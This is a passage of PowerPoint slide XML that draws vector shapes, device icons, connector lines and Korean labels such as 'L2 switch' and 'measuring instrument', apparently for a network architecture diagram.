                    <a:cubicBezTo>
                      <a:pt x="635" y="59"/>
                      <a:pt x="640" y="61"/>
                      <a:pt x="640" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="640" y="71"/>
                      <a:pt x="637" y="74"/>
                      <a:pt x="629" y="74"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="250" y="91"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="70"/>
                      <a:pt x="255" y="70"/>
                      <a:pt x="255" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="281" y="70"/>
                      <a:pt x="281" y="70"/>
                      <a:pt x="281" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="287" y="91"/>
                      <a:pt x="287" y="91"/>
                      <a:pt x="287" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="309" y="91"/>
                      <a:pt x="309" y="91"/>
                      <a:pt x="309" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="281" y="1"/>
                      <a:pt x="281" y="1"/>
                      <a:pt x="281" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="256" y="1"/>
                      <a:pt x="256" y="1"/>
                      <a:pt x="256" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="228" y="91"/>
                      <a:pt x="228" y="91"/>
                      <a:pt x="228" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="250" y="91"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="261" y="46"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="263" y="37"/>
                      <a:pt x="266" y="27"/>
                      <a:pt x="268" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="268" y="17"/>
                      <a:pt x="268" y="17"/>
                      <a:pt x="268" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="271" y="26"/>
                      <a:pt x="273" y="37"/>
                      <a:pt x="275" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="277" y="54"/>
                      <a:pt x="277" y="54"/>
                      <a:pt x="277" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="259" y="54"/>
                      <a:pt x="259" y="54"/>
                      <a:pt x="259" y="54"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="261" y="46"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="410" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="421" y="61"/>
                      <a:pt x="421" y="61"/>
                      <a:pt x="421" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="440" y="61"/>
                      <a:pt x="456" y="52"/>
                      <a:pt x="456" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="456" y="8"/>
                      <a:pt x="440" y="1"/>
                      <a:pt x="420" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="389" y="1"/>
                      <a:pt x="389" y="1"/>
                      <a:pt x="389" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="389" y="91"/>
                      <a:pt x="389" y="91"/>
                      <a:pt x="389" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="91"/>
                      <a:pt x="410" y="91"/>
                      <a:pt x="410" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="410" y="61"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="410" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="419" y="18"/>
                      <a:pt x="419" y="18"/>
                      <a:pt x="419" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="429" y="18"/>
                      <a:pt x="435" y="21"/>
                      <a:pt x="435" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="435" y="39"/>
                      <a:pt x="430" y="44"/>
                      <a:pt x="420" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="410" y="44"/>
                      <a:pt x="410" y="44"/>
                      <a:pt x="410" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="410" y="18"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="167" y="91"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="175" y="52"/>
                      <a:pt x="175" y="52"/>
                      <a:pt x="175" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="45"/>
                      <a:pt x="177" y="38"/>
                      <a:pt x="179" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="31"/>
                      <a:pt x="179" y="31"/>
                      <a:pt x="179" y="31"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="180" y="38"/>
                      <a:pt x="181" y="45"/>
                      <a:pt x="183" y="52"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="191" y="91"/>
                      <a:pt x="191" y="91"/>
                      <a:pt x="191" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="218" y="91"/>
                      <a:pt x="218" y="91"/>
                      <a:pt x="218" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="233" y="1"/>
                      <a:pt x="233" y="1"/>
                      <a:pt x="233" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="213" y="1"/>
                      <a:pt x="213" y="1"/>
                      <a:pt x="213" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="42"/>
                      <a:pt x="207" y="42"/>
                      <a:pt x="207" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="206" y="51"/>
                      <a:pt x="205" y="61"/>
                      <a:pt x="204" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="203" y="70"/>
                      <a:pt x="203" y="70"/>
                      <a:pt x="203" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="201" y="61"/>
                      <a:pt x="200" y="51"/>
                      <a:pt x="198" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="188" y="1"/>
                      <a:pt x="188" y="1"/>
                      <a:pt x="188" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="1"/>
                      <a:pt x="170" y="1"/>
                      <a:pt x="170" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="161" y="42"/>
                      <a:pt x="161" y="42"/>
                      <a:pt x="161" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="51"/>
                      <a:pt x="158" y="61"/>
                      <a:pt x="156" y="70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2" y="42"/>
                      <a:pt x="152" y="42"/>
                      <a:pt x="152" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="146" y="1"/>
                      <a:pt x="146" y="1"/>
                      <a:pt x="146" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="1"/>
                      <a:pt x="124" y="1"/>
                      <a:pt x="124" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="91"/>
                      <a:pt x="141" y="91"/>
                      <a:pt x="141" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="167" y="91"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="334" y="61"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="344" y="61"/>
                      <a:pt x="344" y="61"/>
                      <a:pt x="344" y="61"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="363" y="61"/>
                      <a:pt x="380" y="52"/>
                      <a:pt x="380" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="380" y="8"/>
                      <a:pt x="363" y="1"/>
                      <a:pt x="344" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="1"/>
                      <a:pt x="312" y="1"/>
                      <a:pt x="312" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="312" y="91"/>
                      <a:pt x="312" y="91"/>
                      <a:pt x="312" y="91"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="334" y="91"/>
                      <a:pt x="334" y="91"/>
                      <a:pt x="334" y="91"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="334" y="61"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="334" y="18"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="343" y="18"/>
                      <a:pt x="343" y="18"/>
                      <a:pt x="343" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="353" y="18"/>
                      <a:pt x="359" y="21"/>
                      <a:pt x="359" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="359" y="39"/>
                      <a:pt x="354" y="44"/>
                      <a:pt x="343" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="334" y="44"/>
                      <a:pt x="334" y="44"/>
                      <a:pt x="334" y="44"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="334" y="18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7F4AF23E-32EC-42F9-ADDC-F7321767914E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6469011" y="2640616"/>
              <a:ext cx="972370" cy="532306"/>
              <a:chOff x="5794759" y="2428181"/>
              <a:chExt cx="972370" cy="532306"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 6">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4570D2C-607D-40CA-AA4A-B96484A9E0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6808" y="2428181"/>
                <a:ext cx="54827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b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ko-KR" altLang="en-US" sz="1000" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="231F2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계측기</a:t>
                </a:r>
                <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-KR" sz="10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25" name="AutoShape 67">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E07A217-76C5-4626-8A13-6B40E70F3F3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794759" y="2548139"/>
                <a:ext cx="972370" cy="412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6" name="Rectangle 69">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12C3394F-6305-4862-BF91-CBEFADED50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6450" y="2639219"/>
                <a:ext cx="790575" cy="20161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7" name="Freeform 70">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C83BDDF0-7F7F-4B61-8A9A-528ED641E3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29375" y="2724944"/>
                <a:ext cx="149225" cy="28575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 62 w 94"/>
                  <a:gd name="T1" fmla="*/ 0 h 18"/>
                  <a:gd name="T2" fmla="*/ 62 w 94"/>
                  <a:gd name="T3" fmla="*/ 18 h 18"/>
                  <a:gd name="T4" fmla="*/ 94 w 94"/>
                  <a:gd name="T5" fmla="*/ 18 h 18"/>
                  <a:gd name="T6" fmla="*/ 94 w 94"/>
                  <a:gd name="T7" fmla="*/ 0 h 18"/>
                  <a:gd name="T8" fmla="*/ 62 w 94"/>
                  <a:gd name="T9" fmla="*/ 0 h 18"/>
                  <a:gd name="T10" fmla="*/ 0 w 94"/>
                  <a:gd name="T11" fmla="*/ 18 h 18"/>
                  <a:gd name="T12" fmla="*/ 31 w 94"/>
                  <a:gd name="T13" fmla="*/ 18 h 18"/>
                  <a:gd name="T14" fmla="*/ 31 w 94"/>
                  <a:gd name="T15" fmla="*/ 0 h 18"/>
                  <a:gd name="T16" fmla="*/ 0 w 94"/>
                  <a:gd name="T17" fmla="*/ 0 h 18"/>
                  <a:gd name="T18" fmla="*/ 0 w 94"/>
                  <a:gd name="T1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4" h="18">
                    <a:moveTo>
                      <a:pt x="62" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="62" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="0" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0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" name="Freeform 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96DA78B2-3423-4C7F-9903-99376A9DA6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8646" y="2632292"/>
                <a:ext cx="296863" cy="201612"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 0 h 127"/>
                  <a:gd name="T2" fmla="*/ 0 w 187"/>
                  <a:gd name="T3" fmla="*/ 0 h 127"/>
                  <a:gd name="T4" fmla="*/ 0 w 187"/>
                  <a:gd name="T5" fmla="*/ 127 h 127"/>
                  <a:gd name="T6" fmla="*/ 125 w 187"/>
                  <a:gd name="T7" fmla="*/ 127 h 127"/>
                  <a:gd name="T8" fmla="*/ 187 w 187"/>
                  <a:gd name="T9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127">
                    <a:moveTo>
                      <a:pt x="187" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="125" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="0"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00B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29" name="Freeform 72">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9CC65C1-6098-4D83-BF2A-48D65BA1A7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72162" y="2624932"/>
                <a:ext cx="819151" cy="260349"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 516 w 516"/>
                  <a:gd name="T1" fmla="*/ 0 h 164"/>
                  <a:gd name="T2" fmla="*/ 0 w 516"/>
                  <a:gd name="T3" fmla="*/ 0 h 164"/>
                  <a:gd name="T4" fmla="*/ 0 w 516"/>
                  <a:gd name="T5" fmla="*/ 145 h 164"/>
                  <a:gd name="T6" fmla="*/ 40 w 516"/>
                  <a:gd name="T7" fmla="*/ 145 h 164"/>
                  <a:gd name="T8" fmla="*/ 40 w 516"/>
                  <a:gd name="T9" fmla="*/ 164 h 164"/>
                  <a:gd name="T10" fmla="*/ 134 w 516"/>
                  <a:gd name="T11" fmla="*/ 164 h 164"/>
                  <a:gd name="T12" fmla="*/ 134 w 516"/>
                  <a:gd name="T13" fmla="*/ 145 h 164"/>
                  <a:gd name="T14" fmla="*/ 382 w 516"/>
                  <a:gd name="T15" fmla="*/ 145 h 164"/>
                  <a:gd name="T16" fmla="*/ 382 w 516"/>
                  <a:gd name="T17" fmla="*/ 164 h 164"/>
                  <a:gd name="T18" fmla="*/ 475 w 516"/>
                  <a:gd name="T19" fmla="*/ 164 h 164"/>
                  <a:gd name="T20" fmla="*/ 475 w 516"/>
                  <a:gd name="T21" fmla="*/ 145 h 164"/>
                  <a:gd name="T22" fmla="*/ 516 w 516"/>
                  <a:gd name="T23" fmla="*/ 145 h 164"/>
                  <a:gd name="T24" fmla="*/ 516 w 516"/>
                  <a:gd name="T25" fmla="*/ 0 h 164"/>
                  <a:gd name="T26" fmla="*/ 18 w 516"/>
                  <a:gd name="T27" fmla="*/ 19 h 164"/>
                  <a:gd name="T28" fmla="*/ 181 w 516"/>
                  <a:gd name="T29" fmla="*/ 19 h 164"/>
                  <a:gd name="T30" fmla="*/ 128 w 516"/>
                  <a:gd name="T31" fmla="*/ 127 h 164"/>
                  <a:gd name="T32" fmla="*/ 18 w 516"/>
                  <a:gd name="T33" fmla="*/ 127 h 164"/>
                  <a:gd name="T34" fmla="*/ 18 w 516"/>
                  <a:gd name="T35" fmla="*/ 19 h 164"/>
                  <a:gd name="T36" fmla="*/ 497 w 516"/>
                  <a:gd name="T37" fmla="*/ 127 h 164"/>
                  <a:gd name="T38" fmla="*/ 148 w 516"/>
                  <a:gd name="T39" fmla="*/ 127 h 164"/>
                  <a:gd name="T40" fmla="*/ 201 w 516"/>
                  <a:gd name="T41" fmla="*/ 19 h 164"/>
                  <a:gd name="T42" fmla="*/ 497 w 516"/>
                  <a:gd name="T43" fmla="*/ 19 h 164"/>
                  <a:gd name="T44" fmla="*/ 497 w 516"/>
                  <a:gd name="T45" fmla="*/ 12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16" h="164">
                    <a:moveTo>
                      <a:pt x="516" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="164"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="475" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="516" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="18" y="19"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="181" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="497" y="127"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="148" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="201" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="497" y="127"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="404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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Rectangle 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9CD9B25-4A88-45F5-9DB8-EF4A20B68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766" y="3805670"/>
              <a:ext cx="419987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ko-KR" sz="800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="231F20"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:t>L2</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="800" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="231F20"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                  <a:ea typeface="나눔고딕" panose="020D0604000000000000" pitchFamily="50" charset="-127"/>
                </a:rPr>
                <a:t>스위치</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="ko-KR" altLang="ko-KR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4FE83113-211D-4EFC-B843-EFE52428EE51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3299284" y="4423579"/>
              <a:ext cx="1485151" cy="1274055"/>
              <a:chOff x="3299284" y="4211144"/>
              <a:chExt cx="1485151" cy="1274055"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="5" name="Group 71">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8DEAABA-355C-4214-A5AB-BB50B40EC21B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3299284" y="4893061"/>
                <a:ext cx="878496" cy="592138"/>
                <a:chOff x="6092238" y="3664622"/>
                <a:chExt cx="878496" cy="592138"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="6" name="AutoShape 38">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B8DD5F1-4D92-48F6-9011-CA537BD71EDE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092238" y="3664622"/>
                  <a:ext cx="878496" cy="5921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7" name="Rectangle 40">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97481615-F5E0-486E-B93C-427CF82CBB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33036" y="3743997"/>
                  <a:ext cx="596900" cy="43497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8" name="Rectangle 41">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A24A526-C6EF-4F52-BC04-8248A299D6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47323" y="4136109"/>
                  <a:ext cx="568325" cy="28575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9" name="Freeform 42">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A89EE32-26B5-4741-8A24-16758D2996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58423" y="4178972"/>
                  <a:ext cx="746125" cy="0"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 470"/>
                    <a:gd name="T1" fmla="*/ 470 w 470"/>
                    <a:gd name="T2" fmla="*/ 0 w 47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470">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="47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0" name="Line 43">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5AC909C6-66B3-4FD0-887A-AC4BDC64A38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158423" y="4178972"/>
                  <a:ext cx="746125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11" name="Freeform 44">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EF0817D-533C-4680-A734-973CFA72CE4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58423" y="3729709"/>
                  <a:ext cx="746125" cy="465137"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 432 w 470"/>
                    <a:gd name="T1" fmla="*/ 274 h 293"/>
                    <a:gd name="T2" fmla="*/ 432 w 470"/>
                    <a:gd name="T3" fmla="*/ 0 h 293"/>
                    <a:gd name="T4" fmla="*/ 38 w 470"/>
                    <a:gd name="T5" fmla="*/ 0 h 293"/>
                    <a:gd name="T6" fmla="*/ 38 w 470"/>
                    <a:gd name="T7" fmla="*/ 274 h 293"/>
                    <a:gd name="T8" fmla="*/ 0 w 470"/>
                    <a:gd name="T9" fmla="*/ 274 h 293"/>
                    <a:gd name="T10" fmla="*/ 0 w 470"/>
                    <a:gd name="T11" fmla="*/ 293 h 293"/>
                    <a:gd name="T12" fmla="*/ 470 w 470"/>
                    <a:gd name="T13" fmla="*/ 293 h 293"/>
                    <a:gd name="T14" fmla="*/ 470 w 470"/>
                    <a:gd name="T15" fmla="*/ 274 h 293"/>
                    <a:gd name="T16" fmla="*/ 432 w 470"/>
                    <a:gd name="T17" fmla="*/ 274 h 293"/>
                    <a:gd name="T18" fmla="*/ 56 w 470"/>
                    <a:gd name="T19" fmla="*/ 274 h 293"/>
                    <a:gd name="T20" fmla="*/ 56 w 470"/>
                    <a:gd name="T21" fmla="*/ 18 h 293"/>
                    <a:gd name="T22" fmla="*/ 414 w 470"/>
                    <a:gd name="T23" fmla="*/ 18 h 293"/>
                    <a:gd name="T24" fmla="*/ 414 w 470"/>
                    <a:gd name="T25" fmla="*/ 274 h 293"/>
                    <a:gd name="T26" fmla="*/ 56 w 470"/>
                    <a:gd name="T27" fmla="*/ 274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70" h="293">
                      <a:moveTo>
                        <a:pt x="432" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="432" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="38" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="470" y="293"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="470" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="432" y="274"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="56" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="56" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="414" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56" y="27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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="50" name="직선 연결선 49">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2BA07085-009F-4479-9EF4-BDBE1610452B}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="3738530" y="4747491"/>
                <a:ext cx="0" cy="22494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80E30ACE-97DA-4349-8B98-A1DA8651093C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr/>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3729294" y="4747491"/>
                <a:ext cx="10551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직선 연결선 54">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393BCDA8-9840-4D11-9FA1-920C60544D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75199" y="4211144"/>
                <a:ext cx="0" cy="53634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912482B1-A7E6-4303-9F6C-88BD75817AA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
